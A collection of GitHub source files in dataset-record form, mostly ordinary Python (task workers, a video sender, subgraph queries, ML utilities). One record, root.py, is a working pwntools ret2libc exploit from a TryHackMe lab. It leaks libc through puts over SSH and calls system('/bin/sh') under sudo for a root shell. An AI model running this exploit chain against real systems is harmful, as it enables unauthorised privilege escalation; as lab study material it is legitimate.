self.add_window(window)","repo_name":"alexdutton/gnome-hue","sub_path":"ghue/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35205152972","text":"from collections import namedtuple\nimport copy\nimport rx\nimport dask\nimport sys\nimport os\nimport dxpy.slurm as slurm\nfrom ..model import task as taskpy\nfrom ..model import creators\nfrom .. 
import interface\n\nNB_THREADS = 5\nTHREAD_POOL = rx.concurrency.ThreadPoolScheduler(NB_THREADS)\n\n\nclass Workers:\n @classmethod\n def is_complete(cls, task, *args):\n return task.state == taskpy.State.Complete\n\n @classmethod\n def on_this_worker(cls, task):\n return task.worker == cls.WorkerType\n\n @classmethod\n def plan(cls, task):\n raise NotImplementedError\n\n @classmethod\n def run(cls, task, stdout=None, stderr=None):\n print('RUN CALLED with task')\n print(task)\n if stdout is None:\n stdout = sys.stdout\n if stderr is None:\n stderr = sys.stderr\n (rx.Observable.from_([task])\n .subscribe_on(THREAD_POOL)\n .map(cls.plan)\n .subscribe(on_next=lambda r: print(r, file=stdout),\n on_error=lambda e: print(e, file=stderr)))\n\n\nclass NoAction(Workers):\n WorkerType = taskpy.Worker.NoAction\n\n @classmethod\n def plan(cls, t, *args):\n print(\"NO ACTION PLAN CALLED\")\n t = interface.mark_start(t)\n t = interface.mark_complete(t)\n return 'NoAction of task id: {} done.'.format(t.id)\n\n\ndef sbatch_command(workdir, file):\n cmd = 'cd {0}'.format(workdir)\n if file is not None:\n cmd += ' && sbatch {0}'.format(file)\n return cmd\n\n\ndef normal_command(workdir, command):\n return 'cd {0} && {1}'.format(workdir, command)\n\n\nclass Slurm(Workers):\n WorkerType = taskpy.Worker.Slurm\n\n @classmethod\n def is_complete(cls, task, *args):\n return slurm.is_complete(task.data.get('sid'))\n\n @classmethod\n def plan(cls, task, *args):\n # why?\n # TODO: FIX\n # print(args)\n # raise ValueError('task {0}, args: {1}'.format(task, args))\n # def srun_command(workdir, command):\n # return 'cd {0} && srun {1}'.format(workdir, command)\n\n task = interface.mark_start(task)\n\n # if isinstance(task, templates.TaskCommand):\n # command = task.command(srun_command)\n if not task.type == taskpy.Type.Script:\n raise TypeError(\n 'Slurm worker only support TaskScript tasks, got: {!r}.'.format(task))\n command = sbatch_command(task.workdir, task.data.get('file'))\n with os.popen(command) as fin:\n result = fin.readlines()[0]\n sid = slurm.sid_from_submit(result)\n task.data.update({'sid': sid})\n interface.update(task)\n return result\n\n\nclass MultiThreding(Workers):\n WorkerType = taskpy.Worker.MultiThreading\n\n @classmethod\n def plan(cls, task):\n # TRT = namedtuple('TaskResultTuple', ('task', 'res'))\n task = interface.mark_start(task)\n if task.type == taskpy.Type.Command:\n with os.popen(normal_command(task.workdir, task.data['command'])) as fin:\n result = fin.readlines()\n task = interface.mark_complete(task)\n return result\n\n\nWORKERS = [NoAction, MultiThreding, Slurm]\n\n\ndef get_workers(task):\n for w in WORKERS:\n if w.on_this_worker(task):\n return w\n\n# class Dask(Workers):\n# WorkerType = taskpy.Worker.Dask\n# NB_PROCESSES = 5\n\n# @classmethod\n# def run_plan(cls, task):\n# (rx.Observable.just(task.workers.num_workers)\n# .map(lambda i: dask.delayed(task.run)(i_worker=i))\n# .to_list()\n# .map(lambda l: dask.bag.from_delayed(l))\n# .map(lambda b: b.compute(num_workers=NB_PROCESSES)))\n","repo_name":"Hong-Xiang/dxl","sub_path":"dxpy/dxpy/task/run/workers.py","file_name":"workers.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24954173527","text":"\"\"\"\nVideoSender\n\n\"\"\"\nimport socket\nimport time\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport sys\n\n\n\nHOST = \"IP address reported by VideoReceiver.py\" # server IP address\nPORT = 8000 # server 
port\n\nMATRIX_X,MATRIX_Y=64,32\t# the size of the Waveshare matrix\n\nDEBUG=False\nDEFAULT_FPS=27\n\nSOURCE=\"Your MP4 video\"\n\n\nserverSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# check the source file exists\ntry:\n # just try to open the video\n with open(SOURCE) as fp:\n print(f\"Source {SOURCE} exists\")\n\nexcept Exception as e:\n print(f\"Unable to open {SOURCE}. Error was {e}.Quitting\")\n sys.exit(0)\n\nvid=cv2.VideoCapture(SOURCE)\n\n\n# LED colour correction factors\ngain_r=1.0\ngain_g=0.8\ngain_b=0.5\n\n# work out aspect ratio using first frame\n\n(grabbed, frame) = vid.read()\nframe_h,frame_w=frame.shape[:2]\n\nASPECT_RATIO=frame_h/frame_w\n\nX_SIZE = int(MATRIX_X * ASPECT_RATIO)\nY_SIZE = int(MATRIX_Y * ASPECT_RATIO)\nDSIZE = (X_SIZE, Y_SIZE) # scaling sizes to reduce the frame to fit the matrix\nX_OFF = int((MATRIX_X - X_SIZE) / 2) # offsets for placing the frame in the matrix\nY_OFF = int((MATRIX_Y - Y_SIZE) / 2)\n\nimage_data = np.zeros((MATRIX_Y, MATRIX_X), dtype=np.uint16) # the output frame\n\nprint(f\"frame_h {frame_h} frame_w {frame_w} aspect {ASPECT_RATIO}\")\n\n# work out the video frame rate\n# Find OpenCV version\n(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')\nFPS=DEFAULT_FPS\nif int(major_ver) < 3 :\n FPS = vid.get(cv2.cv.CV_CAP_PROP_FPS)\n print(f\"Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {FPS}\")\nelse :\n FPS = vid.get(cv2.CAP_PROP_FPS)\n print(f\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {FPS}\")\n\nFRAMETIME=1.0/FPS\n\nframe_count=0\n\n#########################################################\nwhile True:\n frame_start = time.monotonic()\n (grabbed, frame) = vid.read()\n\n if not grabbed:\n logit(\"Frame not grabbed from source! End of video?\")\n serverSocket.close()\n break\n\n if DEBUG:\n cv2.imshow(\"frame\",frame)\n cv2.waitKey(0)\n\n # reduce image keeping aspect ratio\n res = cv2.resize(frame, dsize=DSIZE, interpolation=cv2.INTER_CUBIC)\n\n # colour correction required for LED matrix\n res[:,:,0]=np.minimum(res[:,:,0]*gain_r,255)\n res[:,:,1]=np.minimum(res[:,:,1]*gain_g,255)\n res[:,:,2]=np.minimum(res[:,:,2]*gain_b,255)\n\n # convert to RGB565\n R5 = (res[..., 0] >> 3).astype(np.uint16) << 11\n G6 = (res[..., 1] >> 2).astype(np.uint16) << 5\n B5 = (res[..., 2] >> 3).astype(np.uint16)\n\n # Assemble components into RGB565 uint16 image\n RGB565 = R5 | G6 | B5\n\n # paste the image into the matrix shape\n image_data[Y_OFF:Y_OFF+Y_SIZE,X_OFF:X_OFF+X_SIZE]=RGB565 # default aspect ratio 1:1\n\n # flatten the image into a 1D array of bytes\n flat=image_data.flatten()\n frame_bytes=flat.tobytes()\n bytes_sent = serverSocket.sendto(frame_bytes, (HOST, PORT))\n\n #print(f\"Sent {bytes_sent}\")\n cv2.imshow(\"frame\", image_data)\n cv2.waitKey(1)\n # don't send too fast otherwise we get a Laurel and Hardy film\n while (time.monotonic() - frame_start) < FRAMETIME:\n pass\n\n","repo_name":"BNNorman/Pico_W_RGBMATRIX_VideoPlayer","sub_path":"VideoSender.py","file_name":"VideoSender.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22531422335","text":"import json\nfrom abc import ABC\nfrom enum import Enum, auto\nfrom typing import Any, Dict, Generator, Iterator, List, Optional, Tuple, cast\n\nfrom web3 import Web3\n\nfrom packages.valory.skills.abstract_round_abci.behaviour_utils import BaseBehaviour\nfrom packages.valory.skills.abstract_round_abci.models import 
ApiSpecs\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.conditional_tokens import (\n user_positions as user_positions_query,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.network import (\n block_number,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.omen import (\n questions,\n trades,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.realitio import (\n answers as answers_query,\n)\nfrom packages.valory.skills.market_manager_abci.graph_tooling.queries.trades import (\n trades as trades_query,\n)\nfrom packages.valory.skills.market_manager_abci.models import (\n MarketManagerParams,\n SharedState,\n)\nfrom packages.valory.skills.market_manager_abci.rounds import SynchronizedData\n\n\nQUERY_BATCH_SIZE = 1000\n\n\ndef to_content(query: str) -> bytes:\n \"\"\"Convert the given query string to payload content, i.e., add it under a `queries` key and convert it to bytes.\"\"\"\n finalized_query = {\"query\": query}\n encoded_query = json.dumps(finalized_query, sort_keys=True).encode(\"utf-8\")\n\n return encoded_query\n\n\ndef to_graphql_list(li: list) -> str:\n \"\"\"Convert the given list to a string representing a list for a GraphQL query.\"\"\"\n return repr(li).replace(\"'\", '\"')\n\n\nclass FetchStatus(Enum):\n \"\"\"The status of a fetch operation.\"\"\"\n\n SUCCESS = auto()\n IN_PROGRESS = auto()\n FAIL = auto()\n NONE = auto()\n\n\nclass QueryingBehaviour(BaseBehaviour, ABC):\n \"\"\"Abstract behaviour that implements subgraph querying functionality.\"\"\"\n\n def __init__(self, **kwargs: Any) -> None:\n \"\"\"Initialize a querying behaviour.\"\"\"\n super().__init__(**kwargs)\n self._call_failed: bool = False\n self._fetch_status: FetchStatus = FetchStatus.NONE\n self._creators_iterator: Iterator[\n Tuple[str, List[str]]\n ] = self.params.creators_iterator\n self._current_market: str = \"\"\n self._current_creators: List[str] = []\n\n @property\n def params(self) -> MarketManagerParams:\n \"\"\"Get the params.\"\"\"\n return cast(MarketManagerParams, self.context.params)\n\n @property\n def shared_state(self) -> SharedState:\n \"\"\"Get the shared state.\"\"\"\n return cast(SharedState, self.context.state)\n\n @property\n def synchronized_data(self) -> SynchronizedData:\n \"\"\"Return the synchronized data.\"\"\"\n return cast(SynchronizedData, super().synchronized_data)\n\n @property\n def synced_time(self) -> int:\n \"\"\"Get the synchronized time among agents.\"\"\"\n synced_time = self.shared_state.round_sequence.last_round_transition_timestamp\n return int(synced_time.timestamp())\n\n @property\n def current_subgraph(self) -> ApiSpecs:\n \"\"\"Get a subgraph by prediction market's name.\"\"\"\n return getattr(self.context, self._current_market)\n\n def _prepare_fetching(self) -> bool:\n \"\"\"Prepare for fetching a bet.\"\"\"\n if self._fetch_status in (FetchStatus.SUCCESS, FetchStatus.NONE):\n res = next(self._creators_iterator, None)\n if res is None:\n return False\n self._current_market, self._current_creators = res\n\n if self._fetch_status == FetchStatus.FAIL:\n return False\n\n self._fetch_status = FetchStatus.IN_PROGRESS\n return True\n\n def _handle_response(\n self,\n subgraph: ApiSpecs,\n res: Optional[Dict],\n res_context: str,\n sleep_on_fail: bool = True,\n ) -> Generator[None, None, Optional[Any]]:\n \"\"\"Handle a response from a subgraph.\n\n :param subgraph: the subgraph to handle the response for.\n :param res: the response to handle.\n :param res_context: 
the context of the current response.\n :param sleep_on_fail: whether we want to sleep if we fail to get the response's result.\n :return: the response's result, using the given keys. `None` if response is `None` (has failed).\n :yield: None\n \"\"\"\n if res is None:\n self.context.logger.error(\n f\"Could not get {res_context} from {subgraph.api_id}\"\n )\n self._call_failed = True\n subgraph.increment_retries()\n\n if subgraph.is_retries_exceeded():\n self._fetch_status = FetchStatus.FAIL\n\n if sleep_on_fail:\n sleep_time = subgraph.retries_info.suggested_sleep_time\n yield from self.sleep(sleep_time)\n return None\n\n self.context.logger.info(f\"Retrieved {res_context}: {res}.\")\n self._call_failed = False\n subgraph.reset_retries()\n self._fetch_status = FetchStatus.SUCCESS\n return res\n\n def _fetch_bets(self) -> Generator[None, None, Optional[list]]:\n \"\"\"Fetch questions from the current subgraph, for the current creators.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n query = questions.substitute(\n creators=to_graphql_list(self._current_creators),\n slot_count=self.params.slot_count,\n opening_threshold=self.synced_time + self.params.opening_margin,\n languages=to_graphql_list(self.params.languages),\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **self.current_subgraph.get_spec(),\n )\n res = self.current_subgraph.process_response(res_raw)\n\n bets = yield from self._handle_response(\n self.current_subgraph,\n res,\n res_context=\"questions\",\n )\n\n return bets\n\n def _fetch_redeem_info(self) -> Generator[None, None, Optional[list]]:\n \"\"\"Fetch redeeming information from the current subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n current_subgraph = self.context.trades_subgraph\n safe = self.synchronized_data.safe_contract_address\n creation_timestamp_gt = (\n 0 # used to allow for batching based on creation timestamp\n )\n all_trades: List[Dict[str, Any]] = []\n # fetch trades in batches of `QUERY_BATCH_SIZE`\n while True:\n query = trades.substitute(\n creator=safe.lower(),\n first=QUERY_BATCH_SIZE,\n creationTimestamp_gt=creation_timestamp_gt,\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n trades_chunk = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"trades\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all trades.\")\n return all_trades\n\n trades_chunk = cast(List[Dict[str, Any]], trades_chunk)\n if len(trades_chunk) == 0:\n # no more trades to fetch\n return all_trades\n\n # this is the last trade's creation timestamp\n # they are sorted by creation timestamp in ascending order\n # so we can use this to fetch the next batch\n creation_timestamp_gt = trades_chunk[-1][\"fpmm\"][\"creationTimestamp\"]\n all_trades.extend(trades_chunk)\n\n def _fetch_block_number(\n self, timestamp: int\n ) -> Generator[None, None, Dict[str, str]]:\n \"\"\"Get a block number by its timestamp.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n margin = self.params.average_block_time * self.params.abt_error_mult\n query = block_number.substitute(\n timestamp_from=timestamp, timestamp_to=timestamp + margin\n )\n\n current_subgraph = self.context.network_subgraph\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = 
current_subgraph.process_response(res_raw)\n\n block = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"block number\",\n )\n\n return {} if block is None else block\n\n def fetch_claim_params(\n self, question_id: str\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch claim parameters from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.realitio_subgraph\n query = answers_query.substitute(\n question_id=question_id,\n )\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n raw_answers = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"answers\",\n )\n if raw_answers is None:\n # we failed to get the answers\n self.context.logger.error(\n f\"Failing to get answers for question {question_id} from {current_subgraph.api_id}\"\n )\n return None\n answers = [\n {\n \"args\": {\n \"answer\": bytes.fromhex(answer[\"answer\"][2:]),\n \"question_id\": bytes.fromhex(answer[\"question\"][\"questionId\"][2:]),\n \"history_hash\": bytes.fromhex(\n answer[\"question\"][\"historyHash\"][2:]\n ),\n \"user\": Web3.to_checksum_address(answer[\"question\"][\"user\"]),\n \"bond\": int(answer[\"bondAggregate\"]),\n \"timestamp\": int(answer[\"timestamp\"]),\n \"is_commitment\": False,\n }\n }\n for answer in raw_answers\n ]\n return answers\n\n def fetch_trades(\n self,\n creator: str,\n from_timestamp: float,\n to_timestamp: float,\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch trades from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.trades_subgraph\n\n all_trades: List[Dict[str, Any]] = []\n creation_timestamp_gt = (\n 0 # used to allow for batching based on creation timestamp\n )\n # fetch trades in batches of `QUERY_BATCH_SIZE`\n while True:\n query = trades_query.substitute(\n creator=creator.lower(),\n creationTimestamp_lte=int(to_timestamp),\n creationTimestamp_gte=int(from_timestamp),\n first=QUERY_BATCH_SIZE,\n creationTimestamp_gt=creation_timestamp_gt,\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n trades_chunk = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"trades\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all trades.\")\n return all_trades\n\n trades_chunk = cast(List[Dict[str, Any]], trades_chunk)\n if len(trades_chunk) == 0:\n # no more trades to fetch\n return all_trades\n\n # this is the last trade's creation timestamp\n # they are sorted by creation timestamp in ascending order\n # so we can use this to fetch the next batch\n creation_timestamp_gt = trades_chunk[-1][\"creationTimestamp\"]\n all_trades.extend(trades_chunk)\n\n def fetch_user_positions(\n self, user: str\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch positions for a user from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.conditional_tokens_subgraph\n\n user_positions_id_gt = (\n 0 # used to allow for batching based on user positions id\n )\n all_positions: List[Dict[str, Any]] = []\n while True:\n query = user_positions_query.substitute(\n id=user.lower(),\n first=QUERY_BATCH_SIZE,\n 
userPositions_id_gt=user_positions_id_gt,\n )\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n\n positions = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"positions\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all positions.\")\n return all_positions\n\n positions = cast(List[Dict[str, Any]], positions)\n if len(positions) == 0:\n # no more positions to fetch\n return all_positions\n\n all_positions.extend(positions)\n user_positions_id_gt = positions[-1][\"id\"]\n","repo_name":"valory-xyz/trader","sub_path":"packages/valory/skills/market_manager_abci/graph_tooling/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"1385501734","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport tensorflow as tf\n\nfrom model import AutoEncoder\n\n\ndef restore(sess, saver, restore_dir):\n \"\"\"\n Restore model\n\n :param sess: tensorflow session\n :param saver: tensorflow saver\n :param restore_dir: the directory for restore\n :return:\n \"\"\"\n checkpoint = tf.train.get_checkpoint_state(restore_dir)\n if checkpoint is None:\n raise FileNotFoundError('not found model: {}'.format(restore_dir))\n\n saver.restore(sess, checkpoint.model_checkpoint_path)\n\n\ndef get_network(args_hiddens, logger=None):\n \"\"\"\n get autoencoder\n\n :param args_hiddens: args.hiddens (comma separated)\n :param logger: logger\n :return: autoencoder model\n \"\"\"\n hidden_dims = [int(h) for h in args_hiddens.split(',')]\n return AutoEncoder(hidden_dims, logger=logger)\n\n\ndef build_graph(network, input_shape, dtype=tf.float64):\n \"\"\"\n build graph\n\n :param network: network(model)\n :param input_shape: input data's shape\n :param dtype: type of input data\n :return: sess, saver\n \"\"\"\n with tf.Graph().as_default():\n x_ph = tf.placeholder(dtype=dtype, shape=input_shape)\n network.build_graph(x_ph)\n sess = tf.Session()\n saver = tf.train.Saver()\n init_op = tf.global_variables_initializer()\n\n return sess, saver, init_op","repo_name":"dltkr77/tensorflow-autoencoder","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"21744470899","text":"from pwn import *\n\n#initializing binary, elf, libc etc.,\ncontext.binary = binary = './exploit_me'\ncontext.arch = 'amd64'\n\nelf = ELF(binary)\nrop = ROP(elf)\n\n#padding, payloads and rop calls for address leak\npadding = b\"A\"*40\nrop.call(elf.sym['puts'], [elf.got.puts]) #calling puts to get the address of puts\nrop.call(elf.sym['main']) #returning execution back to main function\n\npayload = flat(\n padding, rop.chain()) #chaining our inital payload together\n\n#processes, interaction, finding puts leak\nshell = ssh('zeeshan', '10.10.124.87', keyfile='id_rsa', port=22) #using ssh to login with pwntools\n#io = process(binary)\nio = shell.process(['sudo','./exploit_me']) #starting process with sudo\n\nio.recvline()\nio.sendline(payload)\nleak = u64(io.recvline().rstrip().ljust(8,b'\\0'))\nlog.info(f\"Found puts leak at => {hex(leak)}\")\n\n#calculating base address of libc and 
rebasing\n#matching leaked puts address with https://libc.blukat.me/ we get the required libc(amd64)\nlibc = ELF('libc6_2.23-0ubuntu11.2_amd64.so', checksec=False)\nlibc.address = leak - libc.sym['puts']\nlog.info(f\"base address libc => {hex(libc.address)}\")\n\n#final payload to call /bin/sh\npayload = padding\npayload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])\npayload += p64(next(libc.search(b'/bin/sh')))\npayload += p64(rop.find_gadget(['ret'])[0])\npayload += p64(libc.symbols.system)\n\n#poping shell\nio.recvline()\nio.sendline(payload)\n\nio.interactive()\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/thm/obscure/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7817692550","text":"import SimpleITK as sitk\nfrom .. import __path as path\nfrom .. import __files as files\n\ndef process(data):\n\tfor mod in [\"path_T1\", \"path_T2\", \"path_FLAIR\"]:\n\t\tfilename = data[mod+\"_pre\"] if path.isfile(data[mod+\"_pre\"]) else data[mod]\n\t\tA = (filename)\n\n\t\tinputImage = sitk.ReadImage(A)\n\t\tinputImage = sitk.Cast(inputImage,sitk.sitkFloat32)\n\t\tcorrector = sitk.N4BiasFieldCorrectionImageFilter()\n\n\t\toutput = corrector.Execute(inputImage)\n\t\tnome = path.join(path.dirname(data[mod+\"_pre\"]), \"t\"+path.lastname(data[mod+\"_pre\"]))\n\t\t#nome = nome.encode(\"utf-8\")\n\t\tsitk.WriteImage(output, nome)\n\n\t\tfiles.replace(nome, data[mod+\"_pre\"])","repo_name":"ReplicAI/UniMRI","sub_path":"imsmri/__preprocess/__N4.py","file_name":"__N4.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453489779","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for idx, num in enumerate(nums):\n try:\n other_idx = nums.index(target - num)\n if other_idx != idx:\n return [idx, other_idx]\n except ValueError:\n continue","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0001. 
Two Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37223053698","text":"import graphene\nfrom ..types.WorkoutType import WorkoutType\nfrom ...models import Workout, Program\n\n\nclass WorkoutMutationAdd(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n date = graphene.Date(required=True)\n program_id = graphene.Int(required=True)\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, name, date, program_id):\n program = Program.objects.get(id=program_id)\n workout = Workout(name=name, date=date, program=program)\n workout.save()\n return WorkoutMutationAdd(workout=workout)\n\n\nclass WorkoutMutationUpdate(graphene.Mutation):\n class Arguments:\n id = graphene.Int(required=True)\n name = graphene.String()\n date = graphene.Date()\n program_id = graphene.Int()\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, date=None, program_id=None):\n workout = Workout.objects.get(id=id)\n if name is not None:\n workout.name = name\n if date is not None:\n workout.date = date\n if program_id is not None:\n program = Program.objects.get(id=program_id)\n workout.program = program\n workout.save()\n return WorkoutMutationUpdate(workout=workout)\n\n\nclass WorkoutMutationDelete(graphene.Mutation):\n class Arguments:\n id = graphene.Int(required=True)\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, id):\n workout = Workout.objects.get(id=id)\n workout.delete()\n return True\n\n\nclass WorkoutMutations(graphene.ObjectType):\n add_workout = WorkoutMutationAdd.Field()\n update_workout = WorkoutMutationUpdate.Field()\n delete_workout = WorkoutMutationDelete.Field()\n","repo_name":"doanlng/fitrack","sub_path":"polls/schema/mutations/WorkoutMutations.py","file_name":"WorkoutMutations.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41028540291","text":"import json\nimport csv\nimport matplotlib.pyplot as plt\nimport torch\nimport shutil\nimport datetime\nimport os\n\ndef load_txt(txt_dir, txt_name):\n List = []\n with open(txt_dir + txt_name, 'r') as f:\n for line in f:\n List.append(line.strip('\\n').replace('.nii', '.npy'))\n return List\n\ndef read_json(config_file):\n with open(config_file) as config_buffer:\n config = json.loads(config_buffer.read())\n return config\n\ndef read_csv(filename):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n your_list = list(reader)\n filenames = [a[0] for a in your_list[1:]]\n labels = [0 if a[1]=='CN' else 1 for a in your_list[1:]]\n return filenames, labels\n\ndef load_config():\n config = read_json('./config.json')\n return config\n\ndef stack_plot(stack,rows=6,cols=6,start_with=10,show_every=5,subtitle='title'):\n fig,ax = plt.subplots(rows,cols,figsize=[12,12])\n plt.suptitle(subtitle)\n for i in range(rows*cols):\n ind = start_with = i*show_every\n ax[int(i / rows),int(i % rows)].set_title('slice %d'%ind)\n ax[int(i / rows),int(i % rows)].imshow(stack[:,:,ind],cmap='gray')\n ax[int(i / rows),int(i % rows)].axis('off')\n plt.show()\n\ndef image_plot(img):\n plt.imshow(img,cmap='gray')\n \n \nclass Logger(object):\n def __init__(self, path, header):\n self.log_file = open(path, 'w')\n self.logger = csv.writer(self.log_file, delimiter='\\t')\n\n 
self.logger.writerow(header)\n self.header = header\n \n def __del(self):\n self.log_file.close()\n \n def log(self, values):\n write_values = []\n for col in self.header:\n assert col in values\n write_values.append(values[col])\n\n self.logger.writerow(write_values)\n self.log_file.flush()\n\n\nclass AverageMeter(object):\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n \n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n \ndef create_storename(config):\n log_path = config['result_path']\n log_date = config['save_datetime'] \n model_name = config['model']['model_name']\n model_depth = config['model']['model_depth']\n store_name = model_name + str(model_depth) +'_' + log_date\n full_path = os.path.join(log_path,store_name)\n os.makedirs(full_path, exist_ok = True)\n \n return full_path,store_name\n\ndef save_messgage(config,**kwargs):\n\n from collections import OrderedDict\n\n log_path, store_name = create_storename(config)\n path = os.path.join(log_path,store_name+'.json')\n json_data = OrderedDict()\n\n if kwargs:\n json_data=kwargs\n\n with open(path, 'w') as outfile:\n json.dump(json_data, outfile)\n\n\n \ndef save_checkpoint(state, is_best, config):\n\n log_path, store_name = create_storename(config)\n \n torch.save(state, '%s/%s_checkpoint.pth' % (log_path, store_name))\n if is_best:\n shutil.copyfile('%s/%s_checkpoint.pth' % (log_path, store_name),'%s/%s_best.pth' % (log_path, store_name))","repo_name":"tourbut/BrainMR_MCI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1671077516","text":"import numpy as np\r\nfrom astropy.io import fits\r\nimport cv2\r\nimport os\r\nimport pickle\r\n\r\ndef mean_fits(path_to_file,loadfile):\r\n base_path = path_to_file\r\n total_files = len(os.listdir(base_path))\r\n print(\"the number of total fits images are:\",total_files)\r\n print(\"\\n\")\r\n stack=np.zeros(shape=(2048,2060))\r\n for file in os.listdir(base_path):\r\n hdulist = fits.open(os.path.join(base_path,file))\r\n image = hdulist[0].data\r\n stack = np.add(stack , image)\r\n mean_stack = np.divide(stack,total_files)\r\n file = open(loadfile,'wb')\r\n try:\r\n pickle.dump(mean_stack, file)\r\n file.close()\r\n return 1\r\n except:\r\n print(\"error in dumping the files\")\r\n return 0\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n path = \"E:\\MASTDARK\"\r\n 
